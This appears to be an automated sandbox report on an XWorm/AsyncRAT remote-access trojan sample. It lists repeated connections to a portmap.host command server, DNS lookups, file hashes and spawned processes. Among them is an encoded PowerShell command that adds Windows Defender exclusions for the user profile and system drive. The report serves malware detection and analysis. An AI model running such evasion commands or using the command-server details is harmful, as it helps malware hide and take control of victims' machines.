Mar 16, 2025 13:09:23.987236977 CET  41078  49757  193.161.193.99  192.168.2.4
Mar 16, 2025 13:09:24.060655117 CET  49757  41078  192.168.2.4     193.161.193.99
Mar 16, 2025 13:09:24.065567017 CET  41078  49757  193.161.193.99  192.168.2.4
Mar 16, 2025 13:09:25.392878056 CET  41078  49757  193.161.193.99  192.168.2.4
Mar 16, 2025 13:09:25.392946959 CET  49757  41078  192.168.2.4     193.161.193.99
Mar 16, 2025 13:09:29.154534101 CET  49757  41078  192.168.2.4     193.161.193.99
Mar 16, 2025 13:09:29.157639980 CET  49758  41078  192.168.2.4     193.161.193.99
Mar 16, 2025 13:09:29.159615040 CET  41078  49757  193.161.193.99  192.168.2.4
Mar 16, 2025 13:09:29.162761927 CET  41078  49758  193.161.193.99  192.168.2.4
Mar 16, 2025 13:09:29.162830114 CET  49758  41078  192.168.2.4     193.161.193.99
Mar 16, 2025 13:09:29.199457884 CET  49758  41078  192.168.2.4     193.161.193.99
Mar 16, 2025 13:09:29.204138041 CET  41078  49758  193.161.193.99  192.168.2.4
Mar 16, 2025 13:09:29.482573986 CET  49758  41078  192.168.2.4     193.161.193.99
Mar 16, 2025 13:09:29.487298012 CET  41078  49758  193.161.193.99  192.168.2.4
Mar 16, 2025 13:09:30.809381008 CET  41078  49758  193.161.193.99  192.168.2.4
Mar 16, 2025 13:09:30.809763908 CET  49758  41078  192.168.2.4     193.161.193.99
Mar 16, 2025 13:09:34.232552052 CET  49758  41078  192.168.2.4     193.161.193.99
Mar 16, 2025 13:09:34.235542059 CET  49759  41078  192.168.2.4     193.161.193.99
Mar 16, 2025 13:09:34.237637997 CET  41078  49758  193.161.193.99  192.168.2.4
Mar 16, 2025 13:09:34.240210056 CET  41078  49759  193.161.193.99  192.168.2.4
Mar 16, 2025 13:09:34.240298033 CET  49759  41078  192.168.2.4     193.161.193.99
Mar 16, 2025 13:09:34.357696056 CET  49759  41078  192.168.2.4     193.161.193.99
Mar 16, 2025 13:09:34.362416029 CET  41078  49759  193.161.193.99  192.168.2.4
Mar 16, 2025 13:09:35.920232058 CET  41078  49759  193.161.193.99  192.168.2.4
Mar 16, 2025 13:09:35.920325041 CET  49759  41078  192.168.2.4     193.161.193.99
Mar 16, 2025 13:09:39.857486010 CET  49759  41078  192.168.2.4     193.161.193.99
Mar 16, 2025 13:09:39.859621048 CET  49760  41078  192.168.2.4     193.161.193.99
Mar 16, 2025 13:09:39.862241983 CET  41078  49759  193.161.193.99  192.168.2.4
Mar 16, 2025 13:09:39.864314079 CET  41078  49760  193.161.193.99  192.168.2.4
Mar 16, 2025 13:09:39.864402056 CET  49760  41078  192.168.2.4     193.161.193.99
Mar 16, 2025 13:09:39.903192997 CET  49760  41078  192.168.2.4     193.161.193.99
Mar 16, 2025 13:09:39.907907963 CET  41078  49760  193.161.193.99  192.168.2.4
Mar 16, 2025 13:09:39.920280933 CET  49760  41078  192.168.2.4     193.161.193.99
Mar 16, 2025 13:09:39.924948931 CET  41078  49760  193.161.193.99  192.168.2.4
Mar 16, 2025 13:09:39.983426094 CET  49760  41078  192.168.2.4     193.161.193.99
Mar 16, 2025 13:09:39.988135099 CET  41078  49760  193.161.193.99  192.168.2.4
Mar 16, 2025 13:09:40.264029980 CET  49760  41078  192.168.2.4     193.161.193.99
Mar 16, 2025 13:09:40.268735886 CET  41078  49760  193.161.193.99  192.168.2.4
Mar 16, 2025 13:09:41.532206059 CET  41078  49760  193.161.193.99  192.168.2.4
Mar 16, 2025 13:09:41.532299042 CET  49760  41078  192.168.2.4     193.161.193.99
Mar 16, 2025 13:09:45.357424974 CET  49760  41078  192.168.2.4     193.161.193.99
Mar 16, 2025 13:09:45.359545946 CET  49761  41078  192.168.2.4     193.161.193.99
Mar 16, 2025 13:09:45.363554001 CET  41078  49760  193.161.193.99  192.168.2.4
Mar 16, 2025 13:09:45.364615917 CET  41078  49761  193.161.193.99  192.168.2.4
Mar 16, 2025 13:09:45.364717960 CET  49761  41078  192.168.2.4     193.161.193.99
Mar 16, 2025 13:09:45.410748005 CET  49761  41078  192.168.2.4     193.161.193.99
Mar 16, 2025 13:09:45.415939093 CET  41078  49761  193.161.193.99  192.168.2.4
Mar 16, 2025 13:09:47.034221888 CET  41078  49761  193.161.193.99  192.168.2.4
Mar 16, 2025 13:09:47.034460068 CET  49761  41078  192.168.2.4     193.161.193.99
Mar 16, 2025 13:09:50.498106956 CET  49761  41078  192.168.2.4     193.161.193.99
Mar 16, 2025 13:09:50.500607967 CET  49762  41078  192.168.2.4     193.161.193.99
Mar 16, 2025 13:09:50.502876043 CET  41078  49761  193.161.193.99  192.168.2.4
Mar 16, 2025 13:09:50.505727053 CET  41078  49762  193.161.193.99  192.168.2.4
Mar 16, 2025 13:09:50.505964994 CET  49762  41078  192.168.2.4     193.161.193.99
Mar 16, 2025 13:09:50.597912073 CET  49762  41078  192.168.2.4     193.161.193.99
Mar 16, 2025 13:09:50.602664948 CET  41078  49762  193.161.193.99  192.168.2.4
Mar 16, 2025 13:09:51.358052015 CET  49762  41078  192.168.2.4     193.161.193.99
Mar 16, 2025 13:09:51.362919092 CET  41078  49762  193.161.193.99  192.168.2.4
Mar 16, 2025 13:09:52.157104015 CET  41078  49762  193.161.193.99  192.168.2.4
Mar 16, 2025 13:09:52.161848068 CET  49762  41078  192.168.2.4     193.161.193.99
Mar 16, 2025 13:09:55.748111963 CET  49762  41078  192.168.2.4     193.161.193.99
Mar 16, 2025 13:09:55.751099110 CET  49763  41078  192.168.2.4     193.161.193.99
Mar 16, 2025 13:09:55.752837896 CET  41078  49762  193.161.193.99  192.168.2.4
Mar 16, 2025 13:09:55.755778074 CET  41078  49763  193.161.193.99  192.168.2.4
Mar 16, 2025 13:09:55.755851984 CET  49763  41078  192.168.2.4     193.161.193.99
Mar 16, 2025 13:09:55.791140079 CET  49763  41078  192.168.2.4     193.161.193.99
Mar 16, 2025 13:09:55.795866013 CET  41078  49763  193.161.193.99  192.168.2.4
Mar 16, 2025 13:09:55.824558973 CET  49763  41078  192.168.2.4     193.161.193.99
Mar 16, 2025 13:09:55.829287052 CET  41078  49763  193.161.193.99  192.168.2.4
Mar 16, 2025 13:09:55.936101913 CET  49763  41078  192.168.2.4     193.161.193.99
Mar 16, 2025 13:09:55.940817118 CET  41078  49763  193.161.193.99  192.168.2.4
Mar 16, 2025 13:09:56.045331001 CET  49763  41078  192.168.2.4     193.161.193.99
Mar 16, 2025 13:09:56.050098896 CET  41078  49763  193.161.193.99  192.168.2.4
Mar 16, 2025 13:09:57.407325029 CET  41078  49763  193.161.193.99  192.168.2.4
Mar 16, 2025 13:09:57.407383919 CET  49763  41078  192.168.2.4     193.161.193.99
Mar 16, 2025 13:10:01.248295069 CET  49763  41078  192.168.2.4     193.161.193.99
Mar 16, 2025 13:10:01.250228882 CET  49764  41078  192.168.2.4     193.161.193.99
Mar 16, 2025 13:10:01.254657984 CET  41078  49763  193.161.193.99  192.168.2.4
Mar 16, 2025 13:10:01.256843090 CET  41078  49764  193.161.193.99  192.168.2.4
Mar 16, 2025 13:10:01.256920099 CET  49764  41078  192.168.2.4     193.161.193.99
Mar 16, 2025 13:10:01.312498093 CET  49764  41078  192.168.2.4     193.161.193.99
Mar 16, 2025 13:10:01.319417953 CET  41078  49764  193.161.193.99  192.168.2.4
Mar 16, 2025 13:10:01.326561928 CET  49764  41078  192.168.2.4     193.161.193.99
Mar 16, 2025 13:10:01.333451986 CET  41078  49764  193.161.193.99  192.168.2.4
Mar 16, 2025 13:10:02.924853086 CET  41078  49764  193.161.193.99  192.168.2.4
Mar 16, 2025 13:10:02.924968958 CET  49764  41078  192.168.2.4     193.161.193.99
Mar 16, 2025 13:10:06.514064074 CET  49764  41078  192.168.2.4     193.161.193.99
Mar 16, 2025 13:10:06.518821955 CET  41078  49764  193.161.193.99  192.168.2.4
Mar 16, 2025 13:10:06.523104906 CET  49765  41078  192.168.2.4     193.161.193.99
Mar 16, 2025 13:10:06.527851105 CET  41078  49765  193.161.193.99  192.168.2.4
Mar 16, 2025 13:10:06.529831886 CET  49765  41078  192.168.2.4     193.161.193.99
Mar 16, 2025 13:10:06.625868082 CET  49765  41078  192.168.2.4     193.161.193.99
Mar 16, 2025 13:10:06.630667925 CET  41078  49765  193.161.193.99  192.168.2.4
Mar 16, 2025 13:10:08.169517994 CET  41078  49765  193.161.193.99  192.168.2.4
Mar 16, 2025 13:10:08.170176983 CET  49765  41078  192.168.2.4     193.161.193.99
Mar 16, 2025 13:10:12.076328039 CET  49765  41078  192.168.2.4     193.161.193.99
Mar 16, 2025 13:10:12.078972101 CET  49766  41078  192.168.2.4     193.161.193.99
Mar 16, 2025 13:10:12.081063986 CET  41078  49765  193.161.193.99  192.168.2.4
Mar 16, 2025 13:10:12.083683014 CET  41078  49766  193.161.193.99  192.168.2.4
Mar 16, 2025 13:10:12.083755970 CET  49766  41078  192.168.2.4     193.161.193.99
Mar 16, 2025 13:10:12.115642071 CET  49766  41078  192.168.2.4     193.161.193.99
Mar 16, 2025 13:10:12.120302916 CET  41078  49766  193.161.193.99  192.168.2.4
Mar 16, 2025 13:10:13.755343914 CET  41078  49766  193.161.193.99  192.168.2.4
Mar 16, 2025 13:10:13.755417109 CET  49766  41078  192.168.2.4     193.161.193.99
Mar 16, 2025 13:10:18.107588053 CET  49766  41078  192.168.2.4     193.161.193.99
Mar 16, 2025 13:10:18.110315084 CET  49767  41078  192.168.2.4     193.161.193.99
Mar 16, 2025 13:10:18.112289906 CET  41078  49766  193.161.193.99  192.168.2.4
Mar 16, 2025 13:10:18.115014076 CET  41078  49767  193.161.193.99  192.168.2.4
Mar 16, 2025 13:10:18.115078926 CET  49767  41078  192.168.2.4     193.161.193.99
Mar 16, 2025 13:10:18.150284052 CET  49767  41078  192.168.2.4     193.161.193.99
Mar 16, 2025 13:10:18.155241966 CET  41078  49767  193.161.193.99  192.168.2.4
Mar 16, 2025 13:10:19.764240980 CET  41078  49767  193.161.193.99  192.168.2.4
Mar 16, 2025 13:10:19.764311075 CET  49767  41078  192.168.2.4     193.161.193.99
Mar 16, 2025 13:10:23.201404095 CET  49767  41078  192.168.2.4     193.161.193.99
Mar 16, 2025 13:10:23.202939987 CET  49768  41078  192.168.2.4     193.161.193.99
Mar 16, 2025 13:10:23.206129074 CET  41078  49767  193.161.193.99  192.168.2.4
Mar 16, 2025 13:10:23.207628012 CET  41078  49768  193.161.193.99  192.168.2.4
Mar 16, 2025 13:10:23.207695007 CET  49768  41078  192.168.2.4     193.161.193.99
Mar 16, 2025 13:10:23.240792036 CET  49768  41078  192.168.2.4     193.161.193.99
Mar 16, 2025 13:10:23.245443106 CET  41078  49768  193.161.193.99  192.168.2.4
Mar 16, 2025 13:10:23.279725075 CET  49768  41078  192.168.2.4     193.161.193.99
Mar 16, 2025 13:10:23.284477949 CET  41078  49768  193.161.193.99  192.168.2.4
Mar 16, 2025 13:10:24.861304998 CET  41078  49768  193.161.193.99  192.168.2.4
Mar 16, 2025 13:10:24.864451885 CET  49768  41078  192.168.2.4     193.161.193.99
Mar 16, 2025 13:10:28.344188929 CET  49768  41078  192.168.2.4     193.161.193.99
Mar 16, 2025 13:10:28.346059084 CET  49769  41078  192.168.2.4     193.161.193.99
Mar 16, 2025 13:10:28.352019072 CET  41078  49768  193.161.193.99  192.168.2.4
Mar 16, 2025 13:10:28.354089022 CET  41078  49769  193.161.193.99  192.168.2.4
Mar 16, 2025 13:10:28.354209900 CET  49769  41078  192.168.2.4     193.161.193.99
Mar 16, 2025 13:10:28.586102009 CET  49769  41078  192.168.2.4     193.161.193.99
Mar 16, 2025 13:10:28.591010094 CET  41078  49769  193.161.193.99  192.168.2.4
Mar 16, 2025 13:10:30.034718037 CET  41078  49769  193.161.193.99  192.168.2.4
Mar 16, 2025 13:10:30.034786940 CET  49769  41078  192.168.2.4     193.161.193.99
Mar 16, 2025 13:10:33.701652050 CET  49769  41078  192.168.2.4     193.161.193.99
Mar 16, 2025 13:10:33.703762054 CET  49770  41078  192.168.2.4     193.161.193.99
Mar 16, 2025 13:10:33.706379890 CET  41078  49769  193.161.193.99  192.168.2.4
Mar 16, 2025 13:10:33.709311962 CET  41078  49770  193.161.193.99  192.168.2.4
                                                                                  Mar 16, 2025 13:10:33.709378958 CET4977041078192.168.2.4193.161.193.99
                                                                                  Mar 16, 2025 13:10:33.744040966 CET4977041078192.168.2.4193.161.193.99
                                                                                  Mar 16, 2025 13:10:33.748786926 CET4107849770193.161.193.99192.168.2.4
                                                                                  Mar 16, 2025 13:10:35.372462034 CET4107849770193.161.193.99192.168.2.4
                                                                                  Mar 16, 2025 13:10:35.372536898 CET4977041078192.168.2.4193.161.193.99
                                                                                  Mar 16, 2025 13:10:38.781677961 CET4977041078192.168.2.4193.161.193.99
                                                                                  Mar 16, 2025 13:10:38.782514095 CET4977141078192.168.2.4193.161.193.99
                                                                                  Mar 16, 2025 13:10:38.786456108 CET4107849770193.161.193.99192.168.2.4
                                                                                  Mar 16, 2025 13:10:38.787229061 CET4107849771193.161.193.99192.168.2.4
                                                                                  Mar 16, 2025 13:10:38.787333965 CET4977141078192.168.2.4193.161.193.99
                                                                                  Mar 16, 2025 13:10:39.003680944 CET4977141078192.168.2.4193.161.193.99
                                                                                  Mar 16, 2025 13:10:39.008479118 CET4107849771193.161.193.99192.168.2.4
                                                                                  Mar 16, 2025 13:10:40.437388897 CET4107849771193.161.193.99192.168.2.4
                                                                                  Mar 16, 2025 13:10:40.437506914 CET4977141078192.168.2.4193.161.193.99
                                                                                  Mar 16, 2025 13:10:44.312792063 CET4977141078192.168.2.4193.161.193.99
                                                                                  Mar 16, 2025 13:10:44.313827991 CET4977241078192.168.2.4193.161.193.99
                                                                                  Mar 16, 2025 13:10:44.317583084 CET4107849771193.161.193.99192.168.2.4
                                                                                  Mar 16, 2025 13:10:44.318532944 CET4107849772193.161.193.99192.168.2.4
                                                                                  Mar 16, 2025 13:10:44.318658113 CET4977241078192.168.2.4193.161.193.99
                                                                                  Mar 16, 2025 13:10:44.481995106 CET4977241078192.168.2.4193.161.193.99
                                                                                  Mar 16, 2025 13:10:44.486712933 CET4107849772193.161.193.99192.168.2.4
                                                                                  Mar 16, 2025 13:10:45.988286018 CET4107849772193.161.193.99192.168.2.4
                                                                                  Mar 16, 2025 13:10:45.988369942 CET4977241078192.168.2.4193.161.193.99
                                                                                  Mar 16, 2025 13:10:49.498606920 CET4977241078192.168.2.4193.161.193.99
                                                                                  Mar 16, 2025 13:10:49.502090931 CET4977341078192.168.2.4193.161.193.99
                                                                                  Mar 16, 2025 13:10:49.503377914 CET4107849772193.161.193.99192.168.2.4
                                                                                  Mar 16, 2025 13:10:49.506830931 CET4107849773193.161.193.99192.168.2.4
                                                                                  Mar 16, 2025 13:10:49.506895065 CET4977341078192.168.2.4193.161.193.99
                                                                                  Mar 16, 2025 13:10:49.549520016 CET4977341078192.168.2.4193.161.193.99
                                                                                  Mar 16, 2025 13:10:49.554223061 CET4107849773193.161.193.99192.168.2.4
                                                                                  Mar 16, 2025 13:10:49.654937983 CET4977341078192.168.2.4193.161.193.99
                                                                                  Mar 16, 2025 13:10:49.659632921 CET4107849773193.161.193.99192.168.2.4
                                                                                  Mar 16, 2025 13:10:49.686027050 CET4977341078192.168.2.4193.161.193.99
                                                                                  Mar 16, 2025 13:10:49.690692902 CET4107849773193.161.193.99192.168.2.4
                                                                                  Mar 16, 2025 13:10:49.748537064 CET4977341078192.168.2.4193.161.193.99
                                                                                  Mar 16, 2025 13:10:49.754509926 CET4107849773193.161.193.99192.168.2.4
                                                                                  Mar 16, 2025 13:10:49.936309099 CET4977341078192.168.2.4193.161.193.99
                                                                                  Mar 16, 2025 13:10:49.943798065 CET4107849773193.161.193.99192.168.2.4
                                                                                  Mar 16, 2025 13:10:49.951716900 CET4977341078192.168.2.4193.161.193.99
                                                                                  Mar 16, 2025 13:10:49.959435940 CET4107849773193.161.193.99192.168.2.4
                                                                                  Mar 16, 2025 13:10:49.967294931 CET4977341078192.168.2.4193.161.193.99
                                                                                  Mar 16, 2025 13:10:49.974744081 CET4107849773193.161.193.99192.168.2.4
                                                                                  Mar 16, 2025 13:10:49.998617887 CET4977341078192.168.2.4193.161.193.99
                                                                                  Mar 16, 2025 13:10:50.004221916 CET4107849773193.161.193.99192.168.2.4
                                                                                  Mar 16, 2025 13:10:50.123549938 CET4977341078192.168.2.4193.161.193.99
                                                                                  Mar 16, 2025 13:10:50.129184961 CET4107849773193.161.193.99192.168.2.4
                                                                                  Mar 16, 2025 13:10:51.155086994 CET4107849773193.161.193.99192.168.2.4
                                                                                  Mar 16, 2025 13:10:51.158202887 CET4977341078192.168.2.4193.161.193.99
                                                                                  Mar 16, 2025 13:10:55.187570095 CET4977441078192.168.2.4193.161.193.99
                                                                                  Mar 16, 2025 13:10:55.187570095 CET4977341078192.168.2.4193.161.193.99
                                                                                  Mar 16, 2025 13:10:55.192326069 CET4107849773193.161.193.99192.168.2.4
                                                                                  Mar 16, 2025 13:10:55.192341089 CET4107849774193.161.193.99192.168.2.4
                                                                                  Mar 16, 2025 13:10:55.194120884 CET4977441078192.168.2.4193.161.193.99
                                                                                  Mar 16, 2025 13:10:55.288131952 CET4977441078192.168.2.4193.161.193.99
                                                                                  Mar 16, 2025 13:10:55.292884111 CET4107849774193.161.193.99192.168.2.4
                                                                                  Mar 16, 2025 13:10:56.858045101 CET4107849774193.161.193.99192.168.2.4
                                                                                  Mar 16, 2025 13:10:56.858232021 CET4977441078192.168.2.4193.161.193.99
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Mar 16, 2025 13:06:58.466489077 CET | 62613 | 53 | 192.168.2.4 | 1.1.1.1
Mar 16, 2025 13:06:58.475517988 CET | 53 | 62613 | 1.1.1.1 | 192.168.2.4
Mar 16, 2025 13:06:58.779984951 CET | 54966 | 53 | 192.168.2.4 | 1.1.1.1
Mar 16, 2025 13:06:58.807938099 CET | 53 | 54966 | 1.1.1.1 | 192.168.2.4

Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Mar 16, 2025 13:06:58.466489077 CET | 192.168.2.4 | 1.1.1.1 | 0x7e89 | Standard query (0) | settings-ssl.xboxlive.com | A (IP address) | IN (0x0001) | false
Mar 16, 2025 13:06:58.779984951 CET | 192.168.2.4 | 1.1.1.1 | 0x8835 | Standard query (0) | Dyno15-41078.portmap.host | A (IP address) | IN (0x0001) | false

Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Mar 16, 2025 13:06:58.475517988 CET | 1.1.1.1 | 192.168.2.4 | 0x7e89 | No error (0) | settings-ssl.xboxlive.com | settings-ssl.xboxlive.com.edgekey.net | - | CNAME (Canonical name) | IN (0x0001) | false
Mar 16, 2025 13:06:58.475517988 CET | 1.1.1.1 | 192.168.2.4 | 0x7e89 | No error (0) | settings-ssl.xboxlive.com.edgekey.net | e87.dspb.akamaiedge.net | - | CNAME (Canonical name) | IN (0x0001) | false
Mar 16, 2025 13:06:58.475517988 CET | 1.1.1.1 | 192.168.2.4 | 0x7e89 | No error (0) | e87.dspb.akamaiedge.net | - | 92.123.20.9 | A (IP address) | IN (0x0001) | false
Mar 16, 2025 13:06:58.807938099 CET | 1.1.1.1 | 192.168.2.4 | 0x8835 | No error (0) | Dyno15-41078.portmap.host | - | 193.161.193.99 | A (IP address) | IN (0x0001) | false
• settings-ssl.xboxlive.com

Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.4 | 49710 | 92.123.20.9 | 443 | 7992 | C:\Program Files\WindowsApps\Microsoft.ZuneMusic_10.19071.19011.0_x64__8wekyb3d8bbwe\Music.UI.exe

Timestamp | Bytes transferred | Direction | Data
2025-03-16 12:06:59 UTC | 216 | OUT | GET /XBLWinClient/v10_music/configuration.xml HTTP/1.1
    Accept: */*
    User-Agent: XBLWIN10.19071
    Accept-Language: en-CH
    Accept-Encoding: gzip, deflate, br
    Host: settings-ssl.xboxlive.com
    Connection: Keep-Alive
2025-03-16 12:06:59 UTC | 249 | IN | HTTP/1.1 200 OK
    Cache-Control: public, max-age=3600
    Content-Type: text/xml
    X-Content-Type-Options: nosniff
    X-XblCorrelationId: dcca7236-6e99-4fe7-b6cc-f04b265950e5
    Date: Sun, 16 Mar 2025 12:06:59 GMT
    Content-Length: 2659
    Connection: close
2025-03-16 12:06:59 UTC | 2659 | IN | Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 63 6c 69 65 6e 74 43 6f 6e 66 69 67 75 72 61 74 69 6f 6e 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 2f 58 62 6c 57 69 6e 43 6c 69 65 6e 74 2f 32 30 31 32 2f 30 33 22 20 76 65 72 73 69 6f 6e 3d 22 31 22 3e 0d 0a 20 20 20 20 3c 74 61 72 67 65 74 65 64 43 6c 69 65 6e 74 3e 58 62 6c 57 69 6e 43 6c 69 65 6e 74 3c 2f 74 61 72 67 65 74 65 64 43 6c 69 65 6e 74 20 3e 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0d 0a 20 20 20 20 3c 72 69 67 68 74 73 3e 43 6f 70 79 72 69 67 68 74 20 28 63 29 20 4d 69 63 72 6f 73 6f 66 74 20 43
    Data Ascii: <?xml version="1.0" encoding="utf-8"?><clientConfiguration xmlns="http://schemas.microsoft.com/XblWinClient/2012/03" version="1"> <targetedClient>XblWinClient</targetedClient > <rights>Copyright (c) Microsoft C


Target ID: 0
Start time: 08:06:50
Start date: 16/03/2025
Path: C:\Users\user\Desktop\test2.exe.bin.exe
Wow64 process (32bit): true
Commandline: "C:\Users\user\Desktop\test2.exe.bin.exe"
Imagebase: 0x400000
File size: 153'600 bytes
MD5 hash: 2AA459D8249147D19837B06C8640A950
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Yara matches:
• Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000000.00000002.1208279408.0000000002E50000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
• Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000000.00000002.1208279408.0000000002E50000.00000004.00000020.00020000.00000000.sdmp, Author: ditekSHen
Reputation: low
Has exited: true

Target ID: 1
Start time: 08:06:51
Start date: 16/03/2025
Path: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit): true
Commandline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGQAZgBjACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHoAYgB5ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAG4AdgB3ACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHYAYwBuACMAPgA="
Imagebase: 0xfd0000
File size: 433'152 bytes
MD5 hash: C32CA4ACFCC635EC1EA6ED8A34DF5FAC
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

Target ID: 2
Start time: 08:06:51
Start date: 16/03/2025
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff62fc20000
File size: 862'208 bytes
MD5 hash: 0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

Target ID: 3
Start time: 08:06:51
Start date: 16/03/2025
Path: C:\Users\user\AppData\Local\Temp\XClient.exe
Wow64 process (32bit): false
Commandline: "C:\Users\user\AppData\Local\Temp\XClient.exe"
Imagebase: 0x190000
File size: 66'560 bytes
MD5 hash: 4D152B9AAAEC95BD696369CE3793BBF5
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Yara matches:
• Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000003.00000000.1156694138.0000000000192000.00000002.00000001.01000000.00000006.sdmp, Author: Joe Security
• Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000003.00000000.1156694138.0000000000192000.00000002.00000001.01000000.00000006.sdmp, Author: ditekSHen
• Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: C:\Users\user\AppData\Local\Temp\XClient.exe, Author: Joe Security
• Rule: rat_win_xworm_v3, Description: Finds XWorm (version XClient, v3) samples based on characteristic strings, Source: C:\Users\user\AppData\Local\Temp\XClient.exe, Author: Sekoia.io
• Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: C:\Users\user\AppData\Local\Temp\XClient.exe, Author: ditekSHen
Antivirus matches:
• Detection: 100%, Avira
• Detection: 92%, ReversingLabs
Reputation: low
Has exited: false

Target ID: 4
Start time: 08:06:52
Start date: 16/03/2025
Path: C:\Program Files\WindowsApps\Microsoft.ZuneMusic_10.19071.19011.0_x64__8wekyb3d8bbwe\Music.UI.exe
Wow64 process (32bit): false
Commandline: "C:\Program Files\WindowsApps\Microsoft.ZuneMusic_10.19071.19011.0_x64__8wekyb3d8bbwe\Music.UI.exe" -ServerName:Microsoft.ZuneMusic.AppX48dcrcgzqqdshm3kf61t0cm5e9pyd6h6.mca
Imagebase: 0x7ff65a350000
File size: 23'140'864 bytes
MD5 hash: F963F75C0AD152437E10D656A00793A3
Has elevated privileges: false
Has administrator privileges: false
Programmed in: C, C++ or other language
Reputation: moderate
Has exited: false

Target ID: 7
Start time: 08:06:56
Start date: 16/03/2025
Path: C:\Windows\System32\svchost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
Imagebase: 0x7ff6ca680000
File size: 55'320 bytes
MD5 hash: B7F884C1B74A263F746EE12A5F7C9F6A
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

Target ID: 8
Start time: 08:06:56
Start date: 16/03/2025
Path: C:\Windows\System32\wbem\WmiPrvSE.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Imagebase: 0x7ff75b8b0000
File size: 496'640 bytes
MD5 hash: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51
Has elevated privileges: true
Has administrator privileges: false
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

Target ID: 18
Start time: 08:07:11
Start date: 16/03/2025
Path: C:\Windows\System32\OpenWith.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\OpenWith.exe -Embedding
Imagebase: 0x7ff7a3bd0000
File size: 123'984 bytes
MD5 hash: E4A834784FA08C17D47A1E72429C5109
Has elevated privileges: false
Has administrator privileges: false
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

Target ID: 19
Start time: 08:07:19
Start date: 16/03/2025
Path: C:\Windows\System32\OpenWith.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\OpenWith.exe -Embedding
Imagebase: 0x7ff7a3bd0000
File size: 123'984 bytes
MD5 hash: E4A834784FA08C17D47A1E72429C5109
Has elevated privileges: false
Has administrator privileges: false
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

